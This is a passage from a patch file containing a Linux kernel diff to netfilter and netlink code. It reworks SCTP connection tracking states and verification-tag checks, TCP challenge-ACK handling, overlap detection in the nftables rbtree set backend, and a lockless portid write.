++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -27,22 +27,16 @@
+ #include <net/netfilter/nf_conntrack_ecache.h>
+ #include <net/netfilter/nf_conntrack_timeout.h>
+ 
+-/* FIXME: Examine ipfilter's timeouts and conntrack transitions more
+-   closely.  They're more complex. --RR
+-
+-   And so for me for SCTP :D -Kiran */
+-
+ static const char *const sctp_conntrack_names[] = {
+-	"NONE",
+-	"CLOSED",
+-	"COOKIE_WAIT",
+-	"COOKIE_ECHOED",
+-	"ESTABLISHED",
+-	"SHUTDOWN_SENT",
+-	"SHUTDOWN_RECD",
+-	"SHUTDOWN_ACK_SENT",
+-	"HEARTBEAT_SENT",
+-	"HEARTBEAT_ACKED",
++	[SCTP_CONNTRACK_NONE]			= "NONE",
++	[SCTP_CONNTRACK_CLOSED]			= "CLOSED",
++	[SCTP_CONNTRACK_COOKIE_WAIT]		= "COOKIE_WAIT",
++	[SCTP_CONNTRACK_COOKIE_ECHOED]		= "COOKIE_ECHOED",
++	[SCTP_CONNTRACK_ESTABLISHED]		= "ESTABLISHED",
++	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= "SHUTDOWN_SENT",
++	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= "SHUTDOWN_RECD",
++	[SCTP_CONNTRACK_SHUTDOWN_ACK_SENT]	= "SHUTDOWN_ACK_SENT",
++	[SCTP_CONNTRACK_HEARTBEAT_SENT]		= "HEARTBEAT_SENT",
+ };
+ 
+ #define SECS  * HZ
+@@ -54,12 +48,11 @@ static const unsigned int sctp_timeouts[SCTP_CONNTRACK_MAX] = {
+ 	[SCTP_CONNTRACK_CLOSED]			= 10 SECS,
+ 	[SCTP_CONNTRACK_COOKIE_WAIT]		= 3 SECS,
+ 	[SCTP_CONNTRACK_COOKIE_ECHOED]		= 3 SECS,
+-	[SCTP_CONNTRACK_ESTABLISHED]		= 5 DAYS,
++	[SCTP_CONNTRACK_ESTABLISHED]		= 210 SECS,
+ 	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= 300 SECS / 1000,
+ 	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= 300 SECS / 1000,
+ 	[SCTP_CONNTRACK_SHUTDOWN_ACK_SENT]	= 3 SECS,
+ 	[SCTP_CONNTRACK_HEARTBEAT_SENT]		= 30 SECS,
+-	[SCTP_CONNTRACK_HEARTBEAT_ACKED]	= 210 SECS,
+ };
+ 
+ #define	SCTP_FLAG_HEARTBEAT_VTAG_FAILED	1
+@@ -73,7 +66,6 @@ static const unsigned int sctp_timeouts[SCTP_CONNTRACK_MAX] = {
+ #define	sSR SCTP_CONNTRACK_SHUTDOWN_RECD
+ #define	sSA SCTP_CONNTRACK_SHUTDOWN_ACK_SENT
+ #define	sHS SCTP_CONNTRACK_HEARTBEAT_SENT
+-#define	sHA SCTP_CONNTRACK_HEARTBEAT_ACKED
+ #define	sIV SCTP_CONNTRACK_MAX
+ 
+ /*
+@@ -96,9 +88,6 @@ SHUTDOWN_ACK_SENT - We have seen a SHUTDOWN_ACK chunk in the direction opposite
+ CLOSED            - We have seen a SHUTDOWN_COMPLETE chunk in the direction of
+ 		    the SHUTDOWN chunk. Connection is closed.
+ HEARTBEAT_SENT    - We have seen a HEARTBEAT in a new flow.
+-HEARTBEAT_ACKED   - We have seen a HEARTBEAT-ACK in the direction opposite to
+-		    that of the HEARTBEAT chunk. Secondary connection is
+-		    established.
+ */
+ 
+ /* TODO
+@@ -115,33 +104,33 @@ cookie echoed to closed.
+ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ 	{
+ /*	ORIGINAL	*/
+-/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA */
+-/* init         */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCW, sHA},
+-/* init_ack     */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL, sHA},
+-/* abort        */ {sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL},
+-/* shutdown     */ {sCL, sCL, sCW, sCE, sSS, sSS, sSR, sSA, sCL, sSS},
+-/* shutdown_ack */ {sSA, sCL, sCW, sCE, sES, sSA, sSA, sSA, sSA, sHA},
+-/* error        */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL, sHA},/* Can't have Stale cookie*/
+-/* cookie_echo  */ {sCL, sCL, sCE, sCE, sES, sSS, sSR, sSA, sCL, sHA},/* 5.2.4 - Big TODO */
+-/* cookie_ack   */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL, sHA},/* Can't come in orig dir */
+-/* shutdown_comp*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sCL, sCL, sHA},
+-/* heartbeat    */ {sHS, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA},
+-/* heartbeat_ack*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA}
++/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS */
++/* init         */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCW},
++/* init_ack     */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},
++/* abort        */ {sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL},
++/* shutdown     */ {sCL, sCL, sCW, sCE, sSS, sSS, sSR, sSA, sCL},
++/* shutdown_ack */ {sSA, sCL, sCW, sCE, sES, sSA, sSA, sSA, sSA},
++/* error        */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't have Stale cookie*/
++/* cookie_echo  */ {sCL, sCL, sCE, sCE, sES, sSS, sSR, sSA, sCL},/* 5.2.4 - Big TODO */
++/* cookie_ack   */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't come in orig dir */
++/* shutdown_comp*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sCL, sCL},
++/* heartbeat    */ {sHS, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
++/* heartbeat_ack*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+ 	},
+ 	{
+ /*	REPLY	*/
+-/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA */
+-/* init         */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV, sHA},/* INIT in sCL Big TODO */
+-/* init_ack     */ {sIV, sCW, sCW, sCE, sES, sSS, sSR, sSA, sIV, sHA},
+-/* abort        */ {sIV, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sIV, sCL},
+-/* shutdown     */ {sIV, sCL, sCW, sCE, sSR, sSS, sSR, sSA, sIV, sSR},
+-/* shutdown_ack */ {sIV, sCL, sCW, sCE, sES, sSA, sSA, sSA, sIV, sHA},
+-/* error        */ {sIV, sCL, sCW, sCL, sES, sSS, sSR, sSA, sIV, sHA},
+-/* cookie_echo  */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV, sHA},/* Can't come in reply dir */
+-/* cookie_ack   */ {sIV, sCL, sCW, sES, sES, sSS, sSR, sSA, sIV, sHA},
+-/* shutdown_comp*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sCL, sIV, sHA},
+-/* heartbeat    */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS, sHA},
+-/* heartbeat_ack*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHA, sHA}
++/*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS */
++/* init         */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV},/* INIT in sCL Big TODO */
++/* init_ack     */ {sIV, sCW, sCW, sCE, sES, sSS, sSR, sSA, sIV},
++/* abort        */ {sIV, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sIV},
++/* shutdown     */ {sIV, sCL, sCW, sCE, sSR, sSS, sSR, sSA, sIV},
++/* shutdown_ack */ {sIV, sCL, sCW, sCE, sES, sSA, sSA, sSA, sIV},
++/* error        */ {sIV, sCL, sCW, sCL, sES, sSS, sSR, sSA, sIV},
++/* cookie_echo  */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV},/* Can't come in reply dir */
++/* cookie_ack   */ {sIV, sCL, sCW, sES, sES, sSS, sSR, sSA, sIV},
++/* shutdown_comp*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sCL, sIV},
++/* heartbeat    */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
++/* heartbeat_ack*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sES},
+ 	}
+ };
+ 
+@@ -412,22 +401,29 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 	for_each_sctp_chunk (skb, sch, _sch, offset, dataoff, count) {
+ 		/* Special cases of Verification tag check (Sec 8.5.1) */
+ 		if (sch->type == SCTP_CID_INIT) {
+-			/* Sec 8.5.1 (A) */
++			/* (A) vtag MUST be zero */
+ 			if (sh->vtag != 0)
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_ABORT) {
+-			/* Sec 8.5.1 (B) */
+-			if (sh->vtag != ct->proto.sctp.vtag[dir] &&
+-			    sh->vtag != ct->proto.sctp.vtag[!dir])
++			/* (B) vtag MUST match own vtag if T flag is unset OR
++			 * MUST match peer's vtag if T flag is set
++			 */
++			if ((!(sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[dir]) ||
++			    ((sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[!dir]))
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_SHUTDOWN_COMPLETE) {
+-			/* Sec 8.5.1 (C) */
+-			if (sh->vtag != ct->proto.sctp.vtag[dir] &&
+-			    sh->vtag != ct->proto.sctp.vtag[!dir] &&
+-			    sch->flags & SCTP_CHUNK_FLAG_T)
++			/* (C) vtag MUST match own vtag if T flag is unset OR
++			 * MUST match peer's vtag if T flag is set
++			 */
++			if ((!(sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[dir]) ||
++			    ((sch->flags & SCTP_CHUNK_FLAG_T) &&
++			     sh->vtag != ct->proto.sctp.vtag[!dir]))
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_COOKIE_ECHO) {
+-			/* Sec 8.5.1 (D) */
++			/* (D) vtag must be same as init_vtag as found in INIT_ACK */
+ 			if (sh->vtag != ct->proto.sctp.vtag[dir])
+ 				goto out_unlock;
+ 		} else if (sch->type == SCTP_CID_HEARTBEAT) {
+@@ -501,8 +497,12 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 		}
+ 
+ 		ct->proto.sctp.state = new_state;
+-		if (old_state != new_state)
++		if (old_state != new_state) {
+ 			nf_conntrack_event_cache(IPCT_PROTOINFO, ct);
++			if (new_state == SCTP_CONNTRACK_ESTABLISHED &&
++			    !test_and_set_bit(IPS_ASSURED_BIT, &ct->status))
++				nf_conntrack_event_cache(IPCT_ASSURED, ct);
++		}
+ 	}
+ 	spin_unlock_bh(&ct->lock);
+ 
+@@ -516,14 +516,6 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 
+ 	nf_ct_refresh_acct(ct, ctinfo, skb, timeouts[new_state]);
+ 
+-	if (old_state == SCTP_CONNTRACK_COOKIE_ECHOED &&
+-	    dir == IP_CT_DIR_REPLY &&
+-	    new_state == SCTP_CONNTRACK_ESTABLISHED) {
+-		pr_debug("Setting assured bit\n");
+-		set_bit(IPS_ASSURED_BIT, &ct->status);
+-		nf_conntrack_event_cache(IPCT_ASSURED, ct);
+-	}
+-
+ 	return NF_ACCEPT;
+ 
+ out_unlock:
+diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
+index 6566310831779..3ac1af6f59fcc 100644
+--- a/net/netfilter/nf_conntrack_proto_tcp.c
++++ b/net/netfilter/nf_conntrack_proto_tcp.c
+@@ -1068,6 +1068,13 @@ int nf_conntrack_tcp_packet(struct nf_conn *ct,
+ 				ct->proto.tcp.last_flags |=
+ 					IP_CT_EXP_CHALLENGE_ACK;
+ 		}
++
++		/* possible challenge ack reply to syn */
++		if (old_state == TCP_CONNTRACK_SYN_SENT &&
++		    index == TCP_ACK_SET &&
++		    dir == IP_CT_DIR_REPLY)
++			ct->proto.tcp.last_ack = ntohl(th->ack_seq);
++
+ 		spin_unlock_bh(&ct->lock);
+ 		nf_ct_l4proto_log_invalid(skb, ct, state,
+ 					  "packet (index %d) in dir %d ignored, state %s",
+@@ -1193,6 +1200,14 @@ int nf_conntrack_tcp_packet(struct nf_conn *ct,
+ 			 * segments we ignored. */
+ 			goto in_window;
+ 		}
++
++		/* Reset in response to a challenge-ack we let through earlier */
++		if (old_state == TCP_CONNTRACK_SYN_SENT &&
++		    ct->proto.tcp.last_index == TCP_ACK_SET &&
++		    ct->proto.tcp.last_dir == IP_CT_DIR_REPLY &&
++		    ntohl(th->seq) == ct->proto.tcp.last_ack)
++			goto in_window;
++
+ 		break;
+ 	default:
+ 		/* Keep compilers happy. */
+diff --git a/net/netfilter/nf_conntrack_standalone.c b/net/netfilter/nf_conntrack_standalone.c
+index bca839ab1ae8d..460294bd4b606 100644
+--- a/net/netfilter/nf_conntrack_standalone.c
++++ b/net/netfilter/nf_conntrack_standalone.c
+@@ -601,7 +601,6 @@ enum nf_ct_sysctl_index {
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_SHUTDOWN_RECD,
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_SHUTDOWN_ACK_SENT,
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_HEARTBEAT_SENT,
+-	NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_HEARTBEAT_ACKED,
+ #endif
+ #ifdef CONFIG_NF_CT_PROTO_DCCP
+ 	NF_SYSCTL_CT_PROTO_TIMEOUT_DCCP_REQUEST,
+@@ -886,12 +885,6 @@ static struct ctl_table nf_ct_sysctl_table[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec_jiffies,
+ 	},
+-	[NF_SYSCTL_CT_PROTO_TIMEOUT_SCTP_HEARTBEAT_ACKED] = {
+-		.procname       = "nf_conntrack_sctp_timeout_heartbeat_acked",
+-		.maxlen         = sizeof(unsigned int),
+-		.mode           = 0644,
+-		.proc_handler   = proc_dointvec_jiffies,
+-	},
+ #endif
+ #ifdef CONFIG_NF_CT_PROTO_DCCP
+ 	[NF_SYSCTL_CT_PROTO_TIMEOUT_DCCP_REQUEST] = {
+@@ -1035,7 +1028,6 @@ static void nf_conntrack_standalone_init_sctp_sysctl(struct net *net,
+ 	XASSIGN(SHUTDOWN_RECD, sn);
+ 	XASSIGN(SHUTDOWN_ACK_SENT, sn);
+ 	XASSIGN(HEARTBEAT_SENT, sn);
+-	XASSIGN(HEARTBEAT_ACKED, sn);
+ #undef XASSIGN
+ #endif
+ }
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 7325bee7d1442..19ea4d3c35535 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -38,10 +38,12 @@ static bool nft_rbtree_interval_start(const struct nft_rbtree_elem *rbe)
+ 	return !nft_rbtree_interval_end(rbe);
+ }
+ 
+-static bool nft_rbtree_equal(const struct nft_set *set, const void *this,
+-			     const struct nft_rbtree_elem *interval)
++static int nft_rbtree_cmp(const struct nft_set *set,
++			  const struct nft_rbtree_elem *e1,
++			  const struct nft_rbtree_elem *e2)
+ {
+-	return memcmp(this, nft_set_ext_key(&interval->ext), set->klen) == 0;
++	return memcmp(nft_set_ext_key(&e1->ext), nft_set_ext_key(&e2->ext),
++		      set->klen);
+ }
+ 
+ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set,
+@@ -52,7 +54,6 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 	const struct nft_rbtree_elem *rbe, *interval = NULL;
+ 	u8 genmask = nft_genmask_cur(net);
+ 	const struct rb_node *parent;
+-	const void *this;
+ 	int d;
+ 
+ 	parent = rcu_dereference_raw(priv->root.rb_node);
+@@ -62,12 +63,11 @@ static bool __nft_rbtree_lookup(const struct net *net, const struct nft_set *set
+ 
+ 		rbe = rb_entry(parent, struct nft_rbtree_elem, node);
+ 
+-		this = nft_set_ext_key(&rbe->ext);
+-		d = memcmp(this, key, set->klen);
++		d = memcmp(nft_set_ext_key(&rbe->ext), key, set->klen);
+ 		if (d < 0) {
+ 			parent = rcu_dereference_raw(parent->rb_left);
+ 			if (interval &&
+-			    nft_rbtree_equal(set, this, interval) &&
++			    !nft_rbtree_cmp(set, rbe, interval) &&
+ 			    nft_rbtree_interval_end(rbe) &&
+ 			    nft_rbtree_interval_start(interval))
+ 				continue;
+@@ -215,154 +215,216 @@ static void *nft_rbtree_get(const struct net *net, const struct nft_set *set,
+ 	return rbe;
+ }
+ 
++static int nft_rbtree_gc_elem(const struct nft_set *__set,
++			      struct nft_rbtree *priv,
++			      struct nft_rbtree_elem *rbe)
++{
++	struct nft_set *set = (struct nft_set *)__set;
++	struct rb_node *prev = rb_prev(&rbe->node);
++	struct nft_rbtree_elem *rbe_prev;
++	struct nft_set_gc_batch *gcb;
++
++	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
++	if (!gcb)
++		return -ENOMEM;
++
++	/* search for expired end interval coming before this element. */
++	do {
++		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
++		if (nft_rbtree_interval_end(rbe_prev))
++			break;
++
++		prev = rb_prev(prev);
++	} while (prev != NULL);
++
++	rb_erase(&rbe_prev->node, &priv->root);
++	rb_erase(&rbe->node, &priv->root);
++	atomic_sub(2, &set->nelems);
++
++	nft_set_gc_batch_add(gcb, rbe);
++	nft_set_gc_batch_complete(gcb);
++
++	return 0;
++}
++
++static bool nft_rbtree_update_first(const struct nft_set *set,
++				    struct nft_rbtree_elem *rbe,
++				    struct rb_node *first)
++{
++	struct nft_rbtree_elem *first_elem;
++
++	first_elem = rb_entry(first, struct nft_rbtree_elem, node);
++	/* this element is closest to where the new element is to be inserted:
++	 * update the first element for the node list path.
++	 */
++	if (nft_rbtree_cmp(set, rbe, first_elem) < 0)
++		return true;
++
++	return false;
++}
++
+ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 			       struct nft_rbtree_elem *new,
+ 			       struct nft_set_ext **ext)
+ {
+-	bool overlap = false, dup_end_left = false, dup_end_right = false;
++	struct nft_rbtree_elem *rbe, *rbe_le = NULL, *rbe_ge = NULL;
++	struct rb_node *node, *parent, **p, *first = NULL;
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 genmask = nft_genmask_next(net);
+-	struct nft_rbtree_elem *rbe;
+-	struct rb_node *parent, **p;
+-	int d;
++	int d, err;
+ 
+-	/* Detect overlaps as we descend the tree. Set the flag in these cases:
+-	 *
+-	 * a1. _ _ __>|  ?_ _ __|  (insert end before existing end)
+-	 * a2. _ _ ___|  ?_ _ _>|  (insert end after existing end)
+-	 * a3. _ _ ___? >|_ _ __|  (insert start before existing end)
+-	 *
+-	 * and clear it later on, as we eventually reach the points indicated by
+-	 * '?' above, in the cases described below. We'll always meet these
+-	 * later, locally, due to tree ordering, and overlaps for the intervals
+-	 * that are the closest together are always evaluated last.
+-	 *
+-	 * b1. _ _ __>|  !_ _ __|  (insert end before existing start)
+-	 * b2. _ _ ___|  !_ _ _>|  (insert end after existing start)
+-	 * b3. _ _ ___! >|_ _ __|  (insert start after existing end, as a leaf)
+-	 *            '--' no nodes falling in this range
+-	 * b4.          >|_ _   !  (insert start before existing start)
+-	 *
+-	 * Case a3. resolves to b3.:
+-	 * - if the inserted start element is the leftmost, because the '0'
+-	 *   element in the tree serves as end element
+-	 * - otherwise, if an existing end is found immediately to the left. If
+-	 *   there are existing nodes in between, we need to further descend the
+-	 *   tree before we can conclude the new start isn't causing an overlap
+-	 *
+-	 * or to b4., which, preceded by a3., means we already traversed one or
+-	 * more existing intervals entirely, from the right.
+-	 *
+-	 * For a new, rightmost pair of elements, we'll hit cases b3. and b2.,
+-	 * in that order.
+-	 *
+-	 * The flag is also cleared in two special cases:
+-	 *
+-	 * b5. |__ _ _!|<_ _ _   (insert start right before existing end)
+-	 * b6. |__ _ >|!__ _ _   (insert end right after existing start)
+-	 *
+-	 * which always happen as last step and imply that no further
+-	 * overlapping is possible.
+-	 *
+-	 * Another special case comes from the fact that start elements matching
+-	 * an already existing start element are allowed: insertion is not
+-	 * performed but we return -EEXIST in that case, and the error will be
+-	 * cleared by the caller if NLM_F_EXCL is not present in the request.
+-	 * This way, request for insertion of an exact overlap isn't reported as
+-	 * error to userspace if not desired.
+-	 *
+-	 * However, if the existing start matches a pre-existing start, but the
+-	 * end element doesn't match the corresponding pre-existing end element,
+-	 * we need to report a partial overlap. This is a local condition that
+-	 * can be noticed without need for a tracking flag, by checking for a
+-	 * local duplicated end for a corresponding start, from left and right,
+-	 * separately.
++	/* Descend the tree to search for an existing element greater than the
++	 * key value to insert that is greater than the new element. This is the
++	 * first element to walk the ordered elements to find possible overlap.
+ 	 */
+-
+ 	parent = NULL;
+ 	p = &priv->root.rb_node;
+ 	while (*p != NULL) {
+ 		parent = *p;
+ 		rbe = rb_entry(parent, struct nft_rbtree_elem, node);
+-		d = memcmp(nft_set_ext_key(&rbe->ext),
+-			   nft_set_ext_key(&new->ext),
+-			   set->klen);
++		d = nft_rbtree_cmp(set, rbe, new);
++
+ 		if (d < 0) {
+ 			p = &parent->rb_left;
+-
+-			if (nft_rbtree_interval_start(new)) {
+-				if (nft_rbtree_interval_end(rbe) &&
+-				    nft_set_elem_active(&rbe->ext, genmask) &&
+-				    !nft_set_elem_expired(&rbe->ext) && !*p)
+-					overlap = false;
+-			} else {
+-				if (dup_end_left && !*p)
+-					return -ENOTEMPTY;
+-
+-				overlap = nft_rbtree_interval_end(rbe) &&
+-					  nft_set_elem_active(&rbe->ext,
+-							      genmask) &&
+-					  !nft_set_elem_expired(&rbe->ext);
+-
+-				if (overlap) {
+-					dup_end_right = true;
+-					continue;
+-				}
+-			}
+ 		} else if (d > 0) {
+-			p = &parent->rb_right;
++			if (!first ||
++			    nft_rbtree_update_first(set, rbe, first))
++				first = &rbe->node;
+ 
+-			if (nft_rbtree_interval_end(new)) {
+-				if (dup_end_right && !*p)
+-					return -ENOTEMPTY;
+-
+-				overlap = nft_rbtree_interval_end(rbe) &&
+-					  nft_set_elem_active(&rbe->ext,
+-							      genmask) &&
+-					  !nft_set_elem_expired(&rbe->ext);
+-
+-				if (overlap) {
+-					dup_end_left = true;
+-					continue;
+-				}
+-			} else if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				   !nft_set_elem_expired(&rbe->ext)) {
+-				overlap = nft_rbtree_interval_end(rbe);
+-			}
++			p = &parent->rb_right;
+ 		} else {
+-			if (nft_rbtree_interval_end(rbe) &&
+-			    nft_rbtree_interval_start(new)) {
++			if (nft_rbtree_interval_end(rbe))
+ 				p = &parent->rb_left;
+-
+-				if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				    !nft_set_elem_expired(&rbe->ext))
+-					overlap = false;
+-			} else if (nft_rbtree_interval_start(rbe) &&
+-				   nft_rbtree_interval_end(new)) {
++			else
+ 				p = &parent->rb_right;
++		}
++	}
++
++	if (!first)
++		first = rb_first(&priv->root);
++
++	/* Detect overlap by going through the list of valid tree nodes.
++	 * Values stored in the tree are in reversed order, starting from
++	 * highest to lowest value.
++	 */
++	for (node = first; node != NULL; node = rb_next(node)) {
++		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
+-				if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				    !nft_set_elem_expired(&rbe->ext))
+-					overlap = false;
+-			} else if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				   !nft_set_elem_expired(&rbe->ext)) {
+-				*ext = &rbe->ext;
+-				return -EEXIST;
+-			} else {
+-				overlap = false;
+-				if (nft_rbtree_interval_end(rbe))
+-					p = &parent->rb_left;
+-				else
+-					p = &parent->rb_right;
++		if (!nft_set_elem_active(&rbe->ext, genmask))
++			continue;
++
++		/* perform garbage collection to avoid bogus overlap reports. */
++		if (nft_set_elem_expired(&rbe->ext)) {
++			err = nft_rbtree_gc_elem(set, priv, rbe);
++			if (err < 0)
++				return err;
++
++			continue;
++		}
++
++		d = nft_rbtree_cmp(set, rbe, new);
++		if (d == 0) {
++			/* Matching end element: no need to look for an
++			 * overlapping greater or equal element.
++			 */
++			if (nft_rbtree_interval_end(rbe)) {
++				rbe_le = rbe;
++				break;
++			}
++
++			/* first element that is greater or equal to key value. */
++			if (!rbe_ge) {
++				rbe_ge = rbe;
++				continue;
++			}
++
++			/* this is a closer more or equal element, update it. */
++			if (nft_rbtree_cmp(set, rbe_ge, new) != 0) {
++				rbe_ge = rbe;
++				continue;
++			}
++
++			/* element is equal to key value, make sure flags are
++			 * the same, an existing more or equal start element
++			 * must not be replaced by more or equal end element.
++			 */
++			if ((nft_rbtree_interval_start(new) &&
++			     nft_rbtree_interval_start(rbe_ge)) ||
++			    (nft_rbtree_interval_end(new) &&
++			     nft_rbtree_interval_end(rbe_ge))) {
++				rbe_ge = rbe;
++				continue;
+ 			}
++		} else if (d > 0) {
++			/* annotate element greater than the new element. */
++			rbe_ge = rbe;
++			continue;
++		} else if (d < 0) {
++			/* annotate element less than the new element. */
++			rbe_le = rbe;
++			break;
+ 		}
++	}
+ 
+-		dup_end_left = dup_end_right = false;
++	/* - new start element matching existing start element: full overlap
++	 *   reported as -EEXIST, cleared by caller if NLM_F_EXCL is not given.
++	 */
++	if (rbe_ge && !nft_rbtree_cmp(set, new, rbe_ge) &&
++	    nft_rbtree_interval_start(rbe_ge) == nft_rbtree_interval_start(new)) {
++		*ext = &rbe_ge->ext;
++		return -EEXIST;
+ 	}
+ 
+-	if (overlap)
++	/* - new end element matching existing end element: full overlap
++	 *   reported as -EEXIST, cleared by caller if NLM_F_EXCL is not given.
++	 */
++	if (rbe_le && !nft_rbtree_cmp(set, new, rbe_le) &&
++	    nft_rbtree_interval_end(rbe_le) == nft_rbtree_interval_end(new)) {
++		*ext = &rbe_le->ext;
++		return -EEXIST;
++	}
++
++	/* - new start element with existing closest, less or equal key value
++	 *   being a start element: partial overlap, reported as -ENOTEMPTY.
++	 *   Anonymous sets allow for two consecutive start element since they
++	 *   are constant, skip them to avoid bogus overlap reports.
++	 */
++	if (!nft_set_is_anonymous(set) && rbe_le &&
++	    nft_rbtree_interval_start(rbe_le) && nft_rbtree_interval_start(new))
++		return -ENOTEMPTY;
++
++	/* - new end element with existing closest, less or equal key value
++	 *   being a end element: partial overlap, reported as -ENOTEMPTY.
++	 */
++	if (rbe_le &&
++	    nft_rbtree_interval_end(rbe_le) && nft_rbtree_interval_end(new))
+ 		return -ENOTEMPTY;
+ 
++	/* - new end element with existing closest, greater or equal key value
++	 *   being an end element: partial overlap, reported as -ENOTEMPTY
++	 */
++	if (rbe_ge &&
++	    nft_rbtree_interval_end(rbe_ge) && nft_rbtree_interval_end(new))
++		return -ENOTEMPTY;
++
++	/* Accepted element: pick insertion point depending on key value */
++	parent = NULL;
++	p = &priv->root.rb_node;
++	while (*p != NULL) {
++		parent = *p;
++		rbe = rb_entry(parent, struct nft_rbtree_elem, node);
++		d = nft_rbtree_cmp(set, rbe, new);
++
++		if (d < 0)
++			p = &parent->rb_left;
++		else if (d > 0)
++			p = &parent->rb_right;
++		else if (nft_rbtree_interval_end(rbe))
++			p = &parent->rb_left;
++		else
++			p = &parent->rb_right;
++	}
++
+ 	rb_link_node_rcu(&new->node, parent, p);
+ 	rb_insert_color(&new->node, &priv->root);
+ 	return 0;
+@@ -501,23 +563,37 @@ static void nft_rbtree_gc(struct work_struct *work)
+ 	struct nft_rbtree *priv;
+ 	struct rb_node *node;
+ 	struct nft_set *set;
++	struct net *net;
++	u8 genmask;
+ 
+ 	priv = container_of(work, struct nft_rbtree, gc_work.work);
+ 	set  = nft_set_container_of(priv);
++	net  = read_pnet(&set->net);
++	genmask = nft_genmask_cur(net);
+ 
+ 	write_lock_bh(&priv->lock);
+ 	write_seqcount_begin(&priv->count);
+ 	for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
++		if (!nft_set_elem_active(&rbe->ext, genmask))
++			continue;
++
++		/* elements are reversed in the rbtree for historical reasons,
++		 * from highest to lowest value, that is why end element is
++		 * always visited before the start element.
++		 */
+ 		if (nft_rbtree_interval_end(rbe)) {
+ 			rbe_end = rbe;
+ 			continue;
+ 		}
+ 		if (!nft_set_elem_expired(&rbe->ext))
+ 			continue;
+-		if (nft_set_elem_mark_busy(&rbe->ext))
++
++		if (nft_set_elem_mark_busy(&rbe->ext)) {
++			rbe_end = NULL;
+ 			continue;
++		}
+ 
+ 		if (rbe_prev) {
+ 			rb_erase(&rbe_prev->node, &priv->root);
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index a662e8a5ff84a..e506712967918 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -580,7 +580,9 @@ static int netlink_insert(struct sock *sk, u32 portid)
+ 	if (nlk_sk(sk)->bound)
+ 		goto err;
+ 
+-	nlk_sk(sk)->portid = portid;
++	/* portid can be read locklessly from netlink_getname(). */
++	WRITE_ONCE(nlk_sk(sk)->portid, portid);
++
